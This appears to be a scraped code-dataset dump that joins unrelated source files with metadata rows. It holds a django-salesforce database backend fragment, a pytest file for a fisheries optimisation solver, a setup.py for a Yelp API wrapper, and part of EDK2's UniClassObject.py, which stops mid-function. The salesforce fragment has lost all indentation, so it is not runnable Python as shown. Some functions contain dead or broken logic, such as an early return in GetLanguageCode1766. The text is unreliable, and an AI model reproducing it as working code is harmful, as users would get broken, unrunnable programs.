# TODO Remove this verbose setting after tuning of specific messages.
# Currently it is better more or less.
# http://www.salesforce.com/us/developer/docs/api_rest/Content/errorcodes.htm
verbose = not getattr(getattr(_cursor, 'query', None), 'debug_silent', False)
# Errors are reported in the body
data = response.json()[0]
if response.status_code == 404: # ResourceNotFound
if (f.__func__.__name__ == 'delete') and data['errorCode'] in (
'ENTITY_IS_DELETED', 'INVALID_CROSS_REFERENCE_KEY'):
# It is a delete command and the object is in trash bin or
# completely deleted or it only could be a valid Id for this type
# then is ignored similarly to delete by a classic database query:
# DELETE FROM xy WHERE id = 'something_deleted_yet'
return None
else:
# if this Id can not be ever valid.
raise base.SalesforceError("Couldn't connect to API (404): %s, URL=%s"
% (response.text, url), data, response, verbose)
if(data['errorCode'] == 'INVALID_FIELD'):
raise base.SalesforceError(data['message'], data, response, verbose)
elif(data['errorCode'] == 'MALFORMED_QUERY'):
raise base.SalesforceError(data['message'], data, response, verbose)
elif(data['errorCode'] == 'INVALID_FIELD_FOR_INSERT_UPDATE'):
raise base.SalesforceError(data['message'], data, response, verbose)
elif(data['errorCode'] == 'METHOD_NOT_ALLOWED'):
raise base.SalesforceError('%s: %s' % (url, data['message']), data, response, verbose)
# some kind of failed query
else:
raise base.SalesforceError('%s' % data, data, response, verbose)
def prep_for_deserialize(model, record, using, init_list=None):
"""
Convert a record from SFDC (decoded JSON) to dict(model string, pk, fields)
If fixes fields of some types. If names of required fields `init_list `are
specified, then only these fields are processed.
"""
from salesforce.backend import base
# TODO the parameter 'using' is not currently important.
attribs = record.pop('attributes')
mod = model.__module__.split('.')
if(mod[-1] == 'models'):
app_label = mod[-2]
elif(hasattr(model._meta, 'app_label')):
app_label = getattr(model._meta, 'app_label')
else:
raise ImproperlyConfigured("Can't discover the app_label for %s, you must specify it via model meta options.")
if len(record.keys()) == 1 and model._meta.db_table in record:
while len(record) == 1:
record = list(record.values())[0]
fields = dict()
for x in model._meta.fields:
if not x.primary_key and (not init_list or x.name in init_list):
if x.column.endswith('.Type'):
# Type of generic foreign key
simple_column, _ = x.column.split('.')
fields[x.name] = record[simple_column]['Type']
else:
# Normal fields
field_val = record[x.column]
#db_type = x.db_type(connection=connections[using])
if(x.__class__.__name__ == 'DateTimeField' and field_val is not None):
d = datetime.datetime.strptime(field_val, SALESFORCE_DATETIME_FORMAT)
import pytz
d = d.replace(tzinfo=pytz.utc)
if settings.USE_TZ:
fields[x.name] = d.strftime(DJANGO_DATETIME_FORMAT)
else:
tz = pytz.timezone(settings.TIME_ZONE)
d = tz.normalize(d.astimezone(tz))
fields[x.name] = d.strftime(DJANGO_DATETIME_FORMAT[:-6])
else:
fields[x.name] = field_val
if init_list and set(init_list).difference(fields).difference([SF_PK]):
raise base.DatabaseError("Not found some expected fields")
return dict(
model = '.'.join([app_label, model.__name__]),
pk = record.pop('Id'),
fields = fields,
)
def extract_values(query):
"""
Extract values from insert or update query.
"""
d = dict()
fields = query.model._meta.fields
for index in range(len(fields)):
field = fields[index]
if (field.get_internal_type() == 'AutoField' or
isinstance(query, subqueries.UpdateQuery) and (getattr(field, 'sf_read_only', 0) & NOT_UPDATEABLE) != 0 or
isinstance(query, subqueries.InsertQuery) and (getattr(field, 'sf_read_only', 0) & NOT_CREATEABLE) != 0):
continue
if(isinstance(query, subqueries.UpdateQuery)):
value_or_empty = [value for qfield, model, value in query.values if qfield.name == field.name]
if value_or_empty:
[value] = value_or_empty
else:
assert len(query.values) < len(fields), \
"Match name can miss only with an 'update_fields' argument."
continue
else: # insert
# TODO bulk insert
assert len(query.objs) == 1, "bulk_create is not supported by Salesforce REST API"
value = getattr(query.objs[0], field.attname)
# The 'DEFAULT' is a backward compatibility name.
if isinstance(field, (models.ForeignKey, models.BooleanField)) and value in ('DEFAULT', 'DEFAULTED_ON_CREATE'):
continue
if isinstance(value, models.DefaultedOnCreate):
continue
[arg] = process_json_args([value])
d[field.column] = arg
return d
class SalesforceRawQuerySet(query.RawQuerySet):
def __len__(self):
if self.query.cursor is None:
# force the query
self.query.get_columns()
return self.query.cursor.rowcount
class SalesforceQuerySet(query.QuerySet):
"""
Use a custom SQL compiler to generate SOQL-compliant queries.
"""
def iterator(self):
"""
An iterator over the results from applying this QuerySet to the
remote web service.
"""
try:
sql, params = SQLCompiler(self.query, connections[self.db], None).as_sql()
except EmptyResultSet:
raise StopIteration
cursor = CursorWrapper(connections[self.db], self.query)
cursor.execute(sql, params)
pfd = prep_for_deserialize
only_load = self.query.get_loaded_field_names()
load_fields = []
# If only/defer clauses have been specified,
# build the list of fields that are to be loaded.
if not only_load:
model_cls = self.model
init_list = None
else:
if DJANGO_16_PLUS:
fields = self.model._meta.concrete_fields
fields_with_model = self.model._meta.get_concrete_fields_with_model()
else:
fields = self.model._meta.fields
fields_with_model = self.model._meta.get_fields_with_model()
for field, model in fields_with_model:
if model is None:
model = self.model
try:
selected_name = field.attname if DJANGO_18_PLUS else field.name
if selected_name in only_load[model]:
# Add a field that has been explicitly included
load_fields.append(field.name)
except KeyError:
# Model wasn't explicitly listed in the only_load table
# Therefore, we need to load all fields from this model
load_fields.append(field.name)
init_list = []
skip = set()
for field in fields:
if field.name not in load_fields:
skip.add(field.attname)
else:
init_list.append(field.name)
model_cls = deferred_class_factory(self.model, skip)
field_names = self.query.get_loaded_field_names()
for res in python.Deserializer(pfd(model_cls, r, self.db, init_list) for r in cursor.results):
# Store the source database of the object
res.object._state.db = self.db
# This object came from the database; it's not being added.
res.object._state.adding = False
yield res.object
def query_all(self):
"""
Allows querying for also deleted or merged records.
Lead.objects.query_all().filter(IsDeleted=True,...)
https://www.salesforce.com/us/developer/docs/api_rest/Content/resources_queryall.htm
"""
obj = self._clone(klass=SalesforceQuerySet)
obj.query.set_query_all()
return obj
class SalesforceRawQuery(RawQuery):
def clone(self, using):
return SalesforceRawQuery(self.sql, using, params=self.params)
def get_columns(self):
if self.cursor is None:
self._execute_query()
converter = connections[self.using].introspection.table_name_converter
if self.cursor.rowcount > 0:
return [converter(col) for col in self.cursor.first_row.keys() if col != 'attributes']
# TODO hy: A more general fix is desirable with rewriting more code.
# This is changed due to Django 1.8.4+ https://github.com/django/django/pull/5036
# related to https://code.djangoproject.com/ticket/12768
return ['Id'] if DJANGO_184_PLUS else [SF_PK]
def _execute_query(self):
self.cursor = CursorWrapper(connections[self.using], self)
self.cursor.execute(self.sql, self.params)
def __repr__(self):
return "<SalesforceRawQuery: %s; %r>" % (self.sql, tuple(self.params))
class SalesforceQuery(Query):
"""
Override aggregates.
"""
# Warn against name collision: The name 'aggregates' is the name of
# a new property introduced by Django 1.7 to the parent class
# 'django.db.models.sql.query.Query'.
# 'aggregates_module' is overriden here, to be visible in the base class.
from salesforce.backend import aggregates as aggregates_module
def __init__(self, *args, **kwargs):
super(SalesforceQuery, self).__init__(*args, **kwargs)
self.is_query_all = False
self.first_chunk_len = None
self.max_depth = 1
def clone(self, klass=None, memo=None, **kwargs):
query = Query.clone(self, klass, memo, **kwargs)
query.is_query_all = self.is_query_all
return query
def has_results(self, using):
q = self.clone()
compiler = q.get_compiler(using=using)
return bool(compiler.execute_sql(constants.SINGLE))
def set_query_all(self):
self.is_query_all = True
if DJANGO_18_PLUS:
def get_count(self, using):
"""
Performs a COUNT() query using the current filter constraints.
"""
obj = self.clone()
obj.add_annotation(Count('pk'), alias='x_sf_count', is_summary=True)
number = obj.get_aggregation(using, ['x_sf_count'])['x_sf_count']
if number is None:
number = 0
return number
class CursorWrapper(object):
"""
A wrapper that emulates the behavior of a database cursor.
This is the class that is actually responsible for making connections
to the SF REST API
"""
def __init__(self, db, query=None):
"""
Connect to the Salesforce API.
"""
self.db = db
self.query = query
self.session = db.sf_session
# A consistent value of empty self.results after execute will be `iter([])`
self.results = None
self.rowcount = None
self.first_row = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
@property
def oauth(self):
return self.session.auth.authenticate()
def execute(self, q, args=()):
"""
Send a query to the Salesforce API.
"""
from salesforce.backend import base
self.rowcount = None
if isinstance(self.query, SalesforceQuery) or self.query is None:
response = self.execute_select(q, args)
elif isinstance(self.query, SalesforceRawQuery):
response = self.execute_select(q, args)
elif isinstance(self.query, subqueries.InsertQuery):
response = self.execute_insert(self.query)
elif isinstance(self.query, subqueries.UpdateQuery):
response = self.execute_update(self.query)
elif isinstance(self.query, subqueries.DeleteQuery):
response = self.execute_delete(self.query)
else:
raise base.DatabaseError("Unsupported query: type %s: %s" % (type(self.query), self.query))
# the encoding is detected automatically, e.g. from headers
if(response and response.text):
# parse_float set to decimal.Decimal to avoid precision errors when
# converting from the json number to a float to a Decimal object
# on a model's DecimalField...converts from json number directly
# a Decimal object
data = response.json(parse_float=decimal.Decimal)
# a SELECT query
if('totalSize' in data):
self.rowcount = data['totalSize']
# a successful INSERT query, return after getting PK
elif('success' in data and 'id' in data):
self.lastrowid = data['id']
return
# something we don't recognize
else:
raise base.DatabaseError(data)
if q.upper().startswith('SELECT COUNT() FROM'):
# COUNT() queries in SOQL are a special case, as they don't actually return rows
self.results = iter([[self.rowcount]])
else:
if self.query:
self.query.first_chunk_len = len(data['records'])
self.first_row = data['records'][0] if data['records'] else None
self.results = self.query_results(data)
else:
self.results = iter([])
def execute_select(self, q, args):
processed_sql = str(q) % process_args(args)
cmd = 'query' if not getattr(self.query, 'is_query_all', False) else 'queryAll'
url = u'{base}{api}/{cmd}?{query_str}'.format(
base=self.session.auth.instance_url, api=API_STUB, cmd=cmd,
query_str=urlencode(dict(q=processed_sql)),
)
log.debug(processed_sql)
return handle_api_exceptions(url, self.session.get, _cursor=self)
def query_more(self, nextRecordsUrl):
url = u'%s%s' % (self.session.auth.instance_url, nextRecordsUrl)
return handle_api_exceptions(url, self.session.get, _cursor=self)
def execute_insert(self, query):
table = query.model._meta.db_table
url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/' % table)
headers = {'Content-Type': 'application/json'}
post_data = extract_values(query)
log.debug('INSERT %s%s' % (table, post_data))
return handle_api_exceptions(url, self.session.post, headers=headers, data=json.dumps(post_data), _cursor=self)
def execute_update(self, query):
table = query.model._meta.db_table
# this will break in multi-row updates
if DJANGO_17_PLUS:
pk = query.where.children[0].rhs
elif DJANGO_16_PLUS:
pk = query.where.children[0][3]
else:
pk = query.where.children[0].children[0][-1]
assert pk
url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/%s' % (table, pk))
headers = {'Content-Type': 'application/json'}
post_data = extract_values(query)
log.debug('UPDATE %s(%s)%s' % (table, pk, post_data))
ret = handle_api_exceptions(url, self.session.patch, headers=headers, data=json.dumps(post_data), _cursor=self)
self.rowcount = 1
return ret
def execute_delete(self, query):
table = query.model._meta.db_table
## the root where node's children may itself have children..
def recurse_for_pk(children):
for node in children:
if hasattr(node, 'rhs'):
pk = node.rhs[0] # for Django 1.7+
else:
try:
pk = node[-1][0]
except TypeError:
pk = recurse_for_pk(node.children)
return pk
pk = recurse_for_pk(self.query.where.children)
assert pk
url = self.session.auth.instance_url + API_STUB + ('/sobjects/%s/%s' % (table, pk))
log.debug('DELETE %s(%s)' % (table, pk))
return handle_api_exceptions(url, self.session.delete, _cursor=self)
def query_results(self, results):
while True:
for rec in results['records']:
if rec['attributes']['type'] == 'AggregateResult' and hasattr(self.query, 'aggregate_select'):
assert len(rec) -1 == len(list(self.query.aggregate_select.items()))
# The 'attributes' info is unexpected for Django within fields.
rec = [rec[k] for k, _ in self.query.aggregate_select.items()]
yield rec
if results['done']:
break
# see about Retrieving the Remaining SOQL Query Results
# http://www.salesforce.com/us/developer/docs/api_rest/Content/dome_query.htm#retrieve_remaining_results_title
response = self.query_more(results['nextRecordsUrl'])
results = response.json(parse_float=decimal.Decimal)
def __iter__(self):
return iter(self.results)
def fetchone(self):
"""
Fetch a single result from a previously executed query.
"""
try:
return next(self.results)
except StopIteration:
return None
def fetchmany(self, size=None):
"""
Fetch multiple results from a previously executed query.
"""
if size is None:
size = 200
return list(islice(self.results, size))
def fetchall(self):
"""
Fetch all results from a previously executed query.
"""
return list(self.results)
def close(self): # for Django 1.7+
pass
string_literal = quoted_string_literal
def date_literal(d, c):
if not d.tzinfo:
import time
tz = pytz.timezone(settings.TIME_ZONE)
d = tz.localize(d, is_dst=time.daylight)
# Format of `%z` is "+HHMM"
tzname = datetime.datetime.strftime(d, "%z")
return datetime.datetime.strftime(d, "%Y-%m-%dT%H:%M:%S.000") + tzname
def sobj_id(obj, conv):
return obj.pk
# supported types
sql_conversions = {
int: lambda s,d: str(s),
float: lambda o,d: '%.15g' % o,
type(None): lambda s,d: 'NULL',
str: lambda o,d: string_literal(o, d), # default
bool: lambda s,d: str(s).lower(),
datetime.date: lambda d,c: datetime.date.strftime(d, "%Y-%m-%d"),
datetime.datetime: lambda d,c: date_literal(d, c),
decimal.Decimal: lambda s,d: float(s),
models.SalesforceModel: sobj_id,
}
if not PY3:
sql_conversions[long] = lambda s,d: str(s)
sql_conversions[unicode] = lambda s,d: string_literal(s.encode('utf8'), d)
# supported types
json_conversions = {
int: lambda s,d: str(s),
float: lambda o,d: '%.15g' % o,
type(None): lambda s,d: None,
str: lambda o,d: o, # default
bool: lambda s,d: str(s).lower(),
datetime.date: lambda d,c: datetime.date.strftime(d, "%Y-%m-%d"),
datetime.datetime: date_literal,
datetime.time: lambda d,c: datetime.time.strftime(d, "%H:%M:%S.%f"),
decimal.Decimal: lambda s,d: float(s),
models.SalesforceModel: sobj_id,
}
if not PY3:
json_conversions[long] = lambda s,d: str(s)
json_conversions[unicode] = lambda s,d: s.encode('utf8')
| mit | 5,083,674,688,785,843,000 | 33.691558 | 115 | 0.697847 | false | 3.144034 | false | false | false |
socsol/infsocsol | tests/test_fisheries_det_basic.py | 1 | 2311 | # Copyright 2019 Alastair Pharo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy
import os
import scipy
from numpy.testing import assert_allclose
from infsocsol.helpers import matrix
@pytest.fixture(scope="module", params=[
# engine states time_step start steps steady steady_accuracy optim_accuracy
( 'matlab', 10, 1, (100.0, 0.5), 100, True, 0.01, 0.009 ),
( 'matlab', 20, 0.5, (600.0, 0.6), 200, True, 0.01, 0.015 ),
( 'matlab', 40, 0.25, (60.0, 0.1), 300, True, 0.01, 0.018 ),
( 'matlab', 10, 1, (600.0, 1.0), 200, False, 0.001, None ),
( 'octave', 10, 1, (100.0, 0.5), 100, True, 0.001, 0.009 ),
( 'octave', 20, 0.5, (600.0, 0.6), 200, True, 0.001, 0.015 )
])
def fisheries_scenario(request):
return request.param
def test_fisheries_det_basic(engines, fisheries_scenario):
_engine, states, time_step, _start, steps, steady, steady_accuracy, optim_accuracy = fisheries_scenario
engine = engines[_engine]
start = matrix(engine, _start)
engine.cd(os.path.join(os.path.dirname(__file__), "fisheries_det_basic"))
engine.solve(float(states), float(time_step), nargout=0)
final = numpy.array(engine.sim_final(start, steps))
# This is determined by setting s\dot = 0, which solves to 1 = x/L + q/r e
steady_one = numpy.dot(final, [1/600, 5/4])
if steady:
assert_allclose(steady_one, 1, atol=steady_accuracy)
# This is the most profitable steady state -- x = L/2 + c/2pq
profit_max_steady = numpy.array([[302.5, 0.39667]])
assert_allclose(final, profit_max_steady, rtol=optim_accuracy)
else:
assert steady_one > 1 + steady_accuracy
| apache-2.0 | -2,571,641,643,230,344,000 | 43.442308 | 107 | 0.632627 | false | 3.118758 | false | false | false |
motte/python-yelp | setup.py | 1 | 1207 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from os.path import join
from setuptools import setup, find_packages
import pyyelp
# To get python setup.py test to work on python 2.7
try:
import multiprocessing
import logging
except ImportError:
pass
setup(
name=pyyelp.__name__,
version=pyyelp.__version__,
author=pyyelp.__author__,
author_email=pyyelp.__email__,
url='https://github.com/motte/python-yelp',
download_url = 'https://github.com/motte/python-yelp/tarball/{0}'.format(pyyelp.__version__),
description='Python wrapper for the Yelp v2 api',
long_description=open('README.md').read(),
license='ISC',
packages = [pyyelp.__name__],
keywords = ['yelp', 'wrapper', 'api'],
install_requires=map(str.strip,open(join('requirements', 'base.txt'))),
include_package_data=True,
classifiers=(
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: ISC License (ISCL)',
'Operating System :: OS Independent',
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
),
)
| isc | -8,819,387,810,392,762,000 | 29.948718 | 97 | 0.63546 | false | 3.702454 | false | false | false |
google/google-ctf | third_party/edk2/BaseTools/Source/Python/UPT/Library/UniClassObject.py | 1 | 50306 | ## @file
# Collect all defined strings in multiple uni files.
#
# Copyright (c) 2014 - 2019, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials are licensed and made available
# under the terms and conditions of the BSD License which accompanies this
# distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
"""
Collect all defined strings in multiple uni files
"""
from __future__ import print_function
##
# Import Modules
#
import os, codecs, re
import distutils.util
from Logger import ToolError
from Logger import Log as EdkLogger
from Logger import StringTable as ST
from Library.StringUtils import GetLineNo
from Library.Misc import PathClass
from Library.Misc import GetCharIndexOutStr
from Library import DataType as DT
from Library.ParserValidate import CheckUTF16FileHeader
##
# Static definitions
#
UNICODE_WIDE_CHAR = u'\\wide'
UNICODE_NARROW_CHAR = u'\\narrow'
UNICODE_NON_BREAKING_CHAR = u'\\nbr'
UNICODE_UNICODE_CR = '\r'
UNICODE_UNICODE_LF = '\n'
NARROW_CHAR = u'\uFFF0'
WIDE_CHAR = u'\uFFF1'
NON_BREAKING_CHAR = u'\uFFF2'
CR = u'\u000D'
LF = u'\u000A'
NULL = u'\u0000'
TAB = u'\t'
BACK_SPLASH = u'\\'
gLANG_CONV_TABLE = {'eng':'en', 'fra':'fr', \
'aar':'aa', 'abk':'ab', 'ave':'ae', 'afr':'af', 'aka':'ak', 'amh':'am', \
'arg':'an', 'ara':'ar', 'asm':'as', 'ava':'av', 'aym':'ay', 'aze':'az', \
'bak':'ba', 'bel':'be', 'bul':'bg', 'bih':'bh', 'bis':'bi', 'bam':'bm', \
'ben':'bn', 'bod':'bo', 'bre':'br', 'bos':'bs', 'cat':'ca', 'che':'ce', \
'cha':'ch', 'cos':'co', 'cre':'cr', 'ces':'cs', 'chu':'cu', 'chv':'cv', \
'cym':'cy', 'dan':'da', 'deu':'de', 'div':'dv', 'dzo':'dz', 'ewe':'ee', \
'ell':'el', 'epo':'eo', 'spa':'es', 'est':'et', 'eus':'eu', 'fas':'fa', \
'ful':'ff', 'fin':'fi', 'fij':'fj', 'fao':'fo', 'fry':'fy', 'gle':'ga', \
'gla':'gd', 'glg':'gl', 'grn':'gn', 'guj':'gu', 'glv':'gv', 'hau':'ha', \
'heb':'he', 'hin':'hi', 'hmo':'ho', 'hrv':'hr', 'hat':'ht', 'hun':'hu', \
'hye':'hy', 'her':'hz', 'ina':'ia', 'ind':'id', 'ile':'ie', 'ibo':'ig', \
'iii':'ii', 'ipk':'ik', 'ido':'io', 'isl':'is', 'ita':'it', 'iku':'iu', \
'jpn':'ja', 'jav':'jv', 'kat':'ka', 'kon':'kg', 'kik':'ki', 'kua':'kj', \
'kaz':'kk', 'kal':'kl', 'khm':'km', 'kan':'kn', 'kor':'ko', 'kau':'kr', \
'kas':'ks', 'kur':'ku', 'kom':'kv', 'cor':'kw', 'kir':'ky', 'lat':'la', \
'ltz':'lb', 'lug':'lg', 'lim':'li', 'lin':'ln', 'lao':'lo', 'lit':'lt', \
'lub':'lu', 'lav':'lv', 'mlg':'mg', 'mah':'mh', 'mri':'mi', 'mkd':'mk', \
'mal':'ml', 'mon':'mn', 'mar':'mr', 'msa':'ms', 'mlt':'mt', 'mya':'my', \
'nau':'na', 'nob':'nb', 'nde':'nd', 'nep':'ne', 'ndo':'ng', 'nld':'nl', \
'nno':'nn', 'nor':'no', 'nbl':'nr', 'nav':'nv', 'nya':'ny', 'oci':'oc', \
'oji':'oj', 'orm':'om', 'ori':'or', 'oss':'os', 'pan':'pa', 'pli':'pi', \
'pol':'pl', 'pus':'ps', 'por':'pt', 'que':'qu', 'roh':'rm', 'run':'rn', \
'ron':'ro', 'rus':'ru', 'kin':'rw', 'san':'sa', 'srd':'sc', 'snd':'sd', \
'sme':'se', 'sag':'sg', 'sin':'si', 'slk':'sk', 'slv':'sl', 'smo':'sm', \
'sna':'sn', 'som':'so', 'sqi':'sq', 'srp':'sr', 'ssw':'ss', 'sot':'st', \
'sun':'su', 'swe':'sv', 'swa':'sw', 'tam':'ta', 'tel':'te', 'tgk':'tg', \
'tha':'th', 'tir':'ti', 'tuk':'tk', 'tgl':'tl', 'tsn':'tn', 'ton':'to', \
'tur':'tr', 'tso':'ts', 'tat':'tt', 'twi':'tw', 'tah':'ty', 'uig':'ug', \
'ukr':'uk', 'urd':'ur', 'uzb':'uz', 'ven':'ve', 'vie':'vi', 'vol':'vo', \
'wln':'wa', 'wol':'wo', 'xho':'xh', 'yid':'yi', 'yor':'yo', 'zha':'za', \
'zho':'zh', 'zul':'zu'}
## Convert a python unicode string to a normal string
#
# Convert a python unicode string to a normal string
# UniToStr(u'I am a string') is 'I am a string'
#
# @param Uni: The python unicode string
#
# @retval: The formatted normal string
#
def UniToStr(Uni):
return repr(Uni)[2:-1]
## Convert a unicode string to a Hex list
#
# Convert a unicode string to a Hex list
# UniToHexList('ABC') is ['0x41', '0x00', '0x42', '0x00', '0x43', '0x00']
#
# @param Uni: The python unicode string
#
# @retval List: The formatted hex list
#
def UniToHexList(Uni):
List = []
for Item in Uni:
Temp = '%04X' % ord(Item)
List.append('0x' + Temp[2:4])
List.append('0x' + Temp[0:2])
return List
## Convert special unicode characters
#
# Convert special characters to (c), (r) and (tm).
#
# @param Uni: The python unicode string
#
# @retval NewUni: The converted unicode string
#
def ConvertSpecialUnicodes(Uni):
OldUni = NewUni = Uni
NewUni = NewUni.replace(u'\u00A9', '(c)')
NewUni = NewUni.replace(u'\u00AE', '(r)')
NewUni = NewUni.replace(u'\u2122', '(tm)')
if OldUni == NewUni:
NewUni = OldUni
return NewUni
## GetLanguageCode1766
#
# Check the language code read from .UNI file and convert RFC 4646 codes to RFC 1766 codes
# RFC 1766 language codes supported in compatibility mode
# RFC 4646 language codes supported in native mode
#
# @param LangName: Language codes read from .UNI file
#
# @retval LangName: Valid language code in RFC 1766 format or None
#
def GetLanguageCode1766(LangName, File=None):
return LangName
length = len(LangName)
if length == 2:
if LangName.isalpha():
for Key in gLANG_CONV_TABLE.keys():
if gLANG_CONV_TABLE.get(Key) == LangName.lower():
return Key
elif length == 3:
if LangName.isalpha() and gLANG_CONV_TABLE.get(LangName.lower()):
return LangName
else:
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 1766 language code : %s" % LangName,
File)
elif length == 5:
if LangName[0:2].isalpha() and LangName[2] == '-':
for Key in gLANG_CONV_TABLE.keys():
if gLANG_CONV_TABLE.get(Key) == LangName[0:2].lower():
return Key
elif length >= 6:
if LangName[0:2].isalpha() and LangName[2] == '-':
for Key in gLANG_CONV_TABLE.keys():
if gLANG_CONV_TABLE.get(Key) == LangName[0:2].lower():
return Key
if LangName[0:3].isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None and LangName[3] == '-':
for Key in gLANG_CONV_TABLE.keys():
if Key == LangName[0:3].lower():
return Key
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 4646 language code : %s" % LangName,
File)
## GetLanguageCode
#
# Check the language code read from .UNI file and convert RFC 1766 codes to RFC 4646 codes if appropriate
# RFC 1766 language codes supported in compatibility mode
# RFC 4646 language codes supported in native mode
#
# @param LangName: Language codes read from .UNI file
#
# @retval LangName: Valid lanugage code in RFC 4646 format or None
#
def GetLanguageCode(LangName, IsCompatibleMode, File):
length = len(LangName)
if IsCompatibleMode:
if length == 3 and LangName.isalpha():
TempLangName = gLANG_CONV_TABLE.get(LangName.lower())
if TempLangName is not None:
return TempLangName
return LangName
else:
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 1766 language code : %s" % LangName,
File)
if (LangName[0] == 'X' or LangName[0] == 'x') and LangName[1] == '-':
return LangName
if length == 2:
if LangName.isalpha():
return LangName
elif length == 3:
if LangName.isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None:
return LangName
elif length == 5:
if LangName[0:2].isalpha() and LangName[2] == '-':
return LangName
elif length >= 6:
if LangName[0:2].isalpha() and LangName[2] == '-':
return LangName
if LangName[0:3].isalpha() and gLANG_CONV_TABLE.get(LangName.lower()) is None and LangName[3] == '-':
return LangName
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
"Invalid RFC 4646 language code : %s" % LangName,
File)
## FormatUniEntry
#
# Formatted the entry in Uni file.
#
# @param StrTokenName StrTokenName.
# @param TokenValueList A list need to be processed.
# @param ContainerFile ContainerFile.
#
# @return formatted entry
def FormatUniEntry(StrTokenName, TokenValueList, ContainerFile):
SubContent = ''
PreFormatLength = 40
if len(StrTokenName) > PreFormatLength:
PreFormatLength = len(StrTokenName) + 1
for (Lang, Value) in TokenValueList:
if not Value or Lang == DT.TAB_LANGUAGE_EN_X:
continue
if Lang == '':
Lang = DT.TAB_LANGUAGE_EN_US
if Lang == 'eng':
Lang = DT.TAB_LANGUAGE_EN_US
elif len(Lang.split('-')[0]) == 3:
Lang = GetLanguageCode(Lang.split('-')[0], True, ContainerFile)
else:
Lang = GetLanguageCode(Lang, False, ContainerFile)
ValueList = Value.split('\n')
SubValueContent = ''
for SubValue in ValueList:
if SubValue.strip():
SubValueContent += \
' ' * (PreFormatLength + len('#language en-US ')) + '\"%s\\n\"' % SubValue.strip() + '\r\n'
SubValueContent = SubValueContent[(PreFormatLength + len('#language en-US ')):SubValueContent.rfind('\\n')] \
+ '\"' + '\r\n'
SubContent += ' '*PreFormatLength + '#language %-5s ' % Lang + SubValueContent
if SubContent:
SubContent = StrTokenName + ' '*(PreFormatLength - len(StrTokenName)) + SubContent[PreFormatLength:]
return SubContent
## StringDefClassObject
#
# A structure for language definition
#
class StringDefClassObject(object):
def __init__(self, Name = None, Value = None, Referenced = False, Token = None, UseOtherLangDef = ''):
self.StringName = ''
self.StringNameByteList = []
self.StringValue = ''
self.StringValueByteList = ''
self.Token = 0
self.Referenced = Referenced
self.UseOtherLangDef = UseOtherLangDef
self.Length = 0
if Name is not None:
self.StringName = Name
self.StringNameByteList = UniToHexList(Name)
if Value is not None:
self.StringValue = Value
self.StringValueByteList = UniToHexList(self.StringValue)
self.Length = len(self.StringValueByteList)
if Token is not None:
self.Token = Token
def __str__(self):
return repr(self.StringName) + ' ' + \
repr(self.Token) + ' ' + \
repr(self.Referenced) + ' ' + \
repr(self.StringValue) + ' ' + \
repr(self.UseOtherLangDef)
def UpdateValue(self, Value = None):
if Value is not None:
if self.StringValue:
self.StringValue = self.StringValue + '\r\n' + Value
else:
self.StringValue = Value
self.StringValueByteList = UniToHexList(self.StringValue)
self.Length = len(self.StringValueByteList)
## UniFileClassObject
#
# A structure for .uni file definition
#
class UniFileClassObject(object):
def __init__(self, FileList = None, IsCompatibleMode = False, IncludePathList = None):
self.FileList = FileList
self.File = None
self.IncFileList = FileList
self.UniFileHeader = ''
self.Token = 2
self.LanguageDef = [] #[ [u'LanguageIdentifier', u'PrintableName'], ... ]
self.OrderedStringList = {} #{ u'LanguageIdentifier' : [StringDefClassObject] }
self.OrderedStringDict = {} #{ u'LanguageIdentifier' : {StringName:(IndexInList)} }
self.OrderedStringListByToken = {} #{ u'LanguageIdentifier' : {Token: StringDefClassObject} }
self.IsCompatibleMode = IsCompatibleMode
if not IncludePathList:
self.IncludePathList = []
else:
self.IncludePathList = IncludePathList
if len(self.FileList) > 0:
self.LoadUniFiles(FileList)
#
# Get Language definition
#
def GetLangDef(self, File, Line):
Lang = distutils.util.split_quoted((Line.split(u"//")[0]))
if len(Lang) != 3:
try:
FileIn = codecs.open(File.Path, mode='rb', encoding='utf_8').readlines()
except UnicodeError as Xstr:
FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16').readlines()
except UnicodeError as Xstr:
FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16_le').readlines()
except:
EdkLogger.Error("Unicode File Parser",
ToolError.FILE_OPEN_FAILURE,
"File read failure: %s" % str(Xstr),
ExtraData=File)
LineNo = GetLineNo(FileIn, Line, False)
EdkLogger.Error("Unicode File Parser",
ToolError.PARSER_ERROR,
"Wrong language definition",
ExtraData="""%s\n\t*Correct format is like '#langdef en-US "English"'""" % Line,
File = File, Line = LineNo)
else:
LangName = GetLanguageCode(Lang[1], self.IsCompatibleMode, self.File)
LangPrintName = Lang[2]
IsLangInDef = False
for Item in self.LanguageDef:
if Item[0] == LangName:
IsLangInDef = True
break
if not IsLangInDef:
self.LanguageDef.append([LangName, LangPrintName])
#
# Add language string
#
self.AddStringToList(u'$LANGUAGE_NAME', LangName, LangName, 0, True, Index=0)
self.AddStringToList(u'$PRINTABLE_LANGUAGE_NAME', LangName, LangPrintName, 1, True, Index=1)
if not IsLangInDef:
#
# The found STRING tokens will be added into new language string list
